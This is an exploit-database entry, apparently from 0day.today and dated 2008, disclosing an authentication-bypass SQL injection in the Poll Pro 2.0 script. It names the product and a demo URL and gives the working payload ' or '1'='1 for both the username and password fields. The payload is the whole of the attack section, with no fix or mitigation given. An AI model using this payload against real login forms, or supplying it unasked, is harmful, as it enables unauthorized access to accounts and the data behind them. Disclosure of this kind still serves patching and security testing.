id: 4393
date: 12/09/2008
title: Poll Pro 2.0 (Auth Bypass) Remote SQL Injection Vulnerability
author: AlpHaNiX
cves: 

=============================================================
Poll Pro 2.0 (Auth Bypass) Remote SQL Injection Vulnerability
=============================================================


###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX

###########################################################################

#script   : PollPro
#Version  : v2.0
#download : null
#Demo     : http://www.pollpro.com/pollpro2/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
AUTH BYPASS :

username : ' or '1'='1
password : ' or '1'='1


###########################################################################



#  0day.today [2023-03-24]  #